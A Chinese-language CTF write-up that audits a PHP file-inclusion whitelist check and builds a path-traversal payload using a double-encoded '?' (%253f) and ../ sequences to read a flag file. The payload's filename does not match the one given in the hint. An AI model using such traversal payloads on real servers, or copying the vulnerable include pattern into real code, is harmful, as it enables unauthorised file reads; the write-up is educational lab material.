靶场首页
只看到一个滑稽的表情,查看源码,提示了source.php
代码审计
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" />";
}
这里告诉我们需要满足三个条件:
01.$file的值必须为非空;
02.$file是字符串;
03.$file传入checkFile()可以通过检验;
04.全部满足后,引用相应的文件
审计checkFile()函数
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
首先需要了解一下两个函数:
mb_strpos($string, $a):查找字符串a在字符串string中首次出现的位置,起始位置以0开始;
mb_substr($string, $start, $end):在字符串string中截取以start开始,以end结尾的子串;
01.白名单中有source.php和hint.php
02.$page的值必须为非空且是字符串
03.判断$page是否在白名单中
04.对$page ‘?’之前进行截取赋值给$_page,判断是否在白名单中
05.再对编码之后的$_page进行判断是否在白名单中
构造payload
访问代码中提示的hint.php发现
flag not here, and flag in
ffffllllaaaagggg
所以flag在ffffllllaaaagggg中
这里有一个知识点:双重编码,比如你将?双重编码的话,经过包含时你包含的文件会被当成一个目录
http:``//xxxx:xxxx/source.php?file=source.php%253f../../../../../ffffllllaaaag
../是向上回退目录